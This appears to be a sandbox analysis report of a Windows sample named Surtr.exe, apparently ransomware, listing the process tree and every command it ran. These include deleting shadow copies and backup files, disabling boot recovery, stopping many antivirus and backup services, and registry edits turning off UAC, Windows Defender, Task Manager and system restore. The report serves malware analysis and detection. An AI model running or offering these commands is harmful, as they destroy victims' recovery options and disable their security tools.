PID 1896 wrote to memory of 812	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 812	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 812	1896	Surtr.exe	cmd.exe
PID 812 wrote to memory of 1168	812	cmd.exe	net.exe
PID 812 wrote to memory of 1168	812	cmd.exe	net.exe
PID 812 wrote to memory of 1168	812	cmd.exe	net.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

1168
1132
1692
1492
1192 attrib.exe
524 attrib.exe
1140
892

pid	process
1168
1132
1692
1492
1192	attrib.exe
524	attrib.exe
1140
892

C:\Users\Admin\AppData\Local\Temp\Surtr.exe
"C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1260
- C:\Users\Admin\AppData\Local\Temp\Surtr.exe
  "C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
  2⤵
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
    3⤵
    PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @echo off
    3⤵
    PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c chcp 437
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:576
  - - C:\Windows\system32\chcp.com
      chcp 437
      4⤵
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\net.exe
      net stop "Acronis VSS Provider"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:336
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Acronis VSS Provider"
        5⤵
        
        PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1832
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1352
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      Interacts with shadow copies
      PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:240
  - - C:\Windows\system32\net.exe
      net stop " Enterprise Client Service"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1704
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop " Enterprise Client Service"
        5⤵
        
        PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:812
  - - C:\Windows\system32\net.exe
      net stop "Sophos AutoUpdate Service"
      4⤵
      PID:1168
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
        5⤵
        
        PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
    3⤵
    PID:1164
  - - C:\Windows\system32\net.exe
      net stop "Sophos Clean Service"
      4⤵
      PID:1804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Clean Service"
        5⤵
        
        PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
    3⤵
    PID:1628
  - - C:\Windows\system32\net.exe
      net stop "Sophos Device Control Service"
      4⤵
      PID:968
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Device Control Service"
        5⤵
        
        PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
    3⤵
    PID:612
  - - C:\Windows\system32\net.exe
      net stop "Sophos File Scanner Service"
      4⤵
      PID:992
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos File Scanner Service"
        5⤵
        
        PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
    3⤵
    PID:1516
  - - C:\Windows\system32\net.exe
      net stop "Sophos Health Service"
      4⤵
      PID:1740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Health Service"
        5⤵
        
        PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
    3⤵
    PID:2016
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Agent"
      4⤵
      PID:1824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Agent"
        5⤵
        
        PID:864
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
        5⤵
        
        PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
    3⤵
    PID:1956
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Client"
      4⤵
      PID:1064
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Client"
        5⤵
        
        PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
    3⤵
    PID:1920
  - - C:\Windows\system32\net.exe
      net stop "Sophos Message Router"
      4⤵
      PID:1772
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Message Router"
        5⤵
        
        PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
    3⤵
    PID:524
  - - C:\Windows\system32\net.exe
      net stop "Sophos Safestore Service"
      4⤵
      PID:592
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Safestore Service"
        5⤵
        
        PID:320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
    3⤵
    PID:472
  - - C:\Windows\system32\net.exe
      net stop "Sophos System Protection Service"
      4⤵
      PID:1208
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos System Protection Service"
        5⤵
        
        PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
    3⤵
    PID:1368
  - - C:\Windows\system32\net.exe
      net stop "Sophos Web Control Service"
      4⤵
      PID:824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Web Control Service"
        5⤵
        
        PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
    3⤵
    PID:1224
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Backup Service"
      4⤵
      PID:900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Backup Service"
        5⤵
        
        PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
    3⤵
    PID:688
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Filter Service"
      4⤵
      PID:432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Filter Service"
        5⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
    3⤵
    PID:1200
  - - C:\Windows\system32\net.exe
      net stop "Symantec System Recovery"
      4⤵
      PID:1140
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Symantec System Recovery"
        5⤵
        
        PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:1160
  - - C:\Windows\system32\net.exe
      net stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:1052
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
        5⤵
        
        PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
    3⤵
    PID:1172
  - - C:\Windows\system32\net.exe
      net stop "AcronisAgent"
      4⤵
      PID:1488
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcronisAgent"
        5⤵
        
        PID:952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
    3⤵
    PID:1624
  - - C:\Windows\system32\net.exe
      net stop "AcrSch2Svc"
      4⤵
      PID:1648
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcrSch2Svc"
        5⤵
        
        PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    PID:1420
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      4⤵
      Interacts with shadow copies
      PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:1364
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Antivirus"
    3⤵
    PID:796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
    3⤵
    PID:1768
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentAccelerator"
      4⤵
      PID:660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
        5⤵
        
        PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\*.bkf C:\Backup*.* C:\backup*.*
    3⤵
    PID:1772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    PID:764
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
    3⤵
    PID:1476
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentBrowser"
      4⤵
      PID:636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
        5⤵
        
        PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:472
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
    3⤵
    PID:1012
  - - C:\Windows\system32\net.exe
      net stop "BackupExecDeviceMediaService"
      4⤵
      PID:1656
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
        5⤵
        
        PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:396
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:240
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
    3⤵
    PID:1168
  - - C:\Windows\system32\net.exe
      net stop "BackupExecJobEngine"
      4⤵
      PID:1200
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecJobEngine"
        5⤵
        
        PID:1052
  - - C:\Windows\system32\net.exe
      net stop "mozyprobackup"
      4⤵
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1140
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:1048
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mozyprobackup"
        5⤵
        
        PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
    3⤵
    PID:1160
  - - C:\Windows\system32\net.exe
      net stop "BackupExecManagementService"
      4⤵
      PID:968
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecManagementService"
        5⤵
        
        PID:1184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer100"
      4⤵
      PID:1184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1628
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:1116
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
      4⤵
      PID:1076
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer100"
      4⤵
      PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
    3⤵
    PID:1848
  - - C:\Windows\system32\net.exe
      net stop "BackupExecRPCService"
      4⤵
      PID:1492
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecRPCService"
        5⤵
        
        PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1352
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
      4⤵
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:204
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
    3⤵
    PID:212
  - - C:\Windows\system32\net.exe
      net stop "BackupExecVSSProvider"
      4⤵
      PID:228
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecVSSProvider"
        5⤵
        
        PID:236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1204
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
      4⤵
      PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
    3⤵
    PID:1648
  - - C:\Windows\system32\net.exe
      net stop "EPSecurityService"
      4⤵
      PID:1624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EPSecurityService"
        5⤵
        
        PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1956
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      4⤵
      PID:796
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMTA"
        5⤵
        
        PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
    3⤵
    PID:564
  - - C:\Windows\system32\net.exe
      net stop "IISAdmin"
      4⤵
      PID:1516
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IISAdmin"
        5⤵
        
        PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:864
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
    3⤵
    PID:320
  - - C:\Windows\system32\net.exe
      net stop "IMAP4Svc"
      4⤵
      PID:1092
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IMAP4Svc"
        5⤵
        
        PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:592
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
      4⤵
      PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
    3⤵
    PID:1272
  - - C:\Windows\system32\net.exe
      net stop "macmnsvc"
      4⤵
      PID:288
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "macmnsvc"
        5⤵
        
        PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:336
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
      4⤵
      PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "masvc"
    3⤵
    PID:1556
  - - C:\Windows\system32\net.exe
      net stop "masvc"
      4⤵
      PID:900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "masvc"
        5⤵
        
        PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:688
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
      4⤵
      PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBAMService"
    3⤵
    PID:1796
  - - C:\Windows\system32\net.exe
      net stop "MBAMService"
      4⤵
      PID:1148
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBAMService"
        5⤵
        
        PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1804
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:952
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
    3⤵
    PID:1180
  - - C:\Windows\system32\net.exe
      net stop "MBEndpointAgent"
      4⤵
      PID:1088
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBEndpointAgent"
        5⤵
        
        PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1356
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:1132
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
      4⤵
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
    3⤵
    PID:620
  - - C:\Windows\system32\net.exe
      net stop "McAfeeEngineService"
      4⤵
      PID:388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeEngineService"
        5⤵
        
        PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:208
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
      4⤵
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
    3⤵
    PID:2036
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFramework"
      4⤵
      PID:216
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFramework"
        5⤵
        
        PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1192
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1752
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:816
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:1972
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
        5⤵
        
        PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:1316
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McShield"
    3⤵
    PID:1920
  - - C:\Windows\system32\net.exe
      net stop "McShield"
      4⤵
      PID:528
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McShield"
        5⤵
        
        PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1064
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfemms"
    3⤵
    PID:1768
  - - C:\Windows\system32\net.exe
      net stop "mfemms"
      4⤵
      PID:764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfemms"
        5⤵
        
        PID:576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:660
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfevtp"
    3⤵
    PID:1656
  - - C:\Windows\system32\net.exe
      net stop "mfevtp"
      4⤵
      PID:472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfevtp"
        5⤵
        
        PID:812
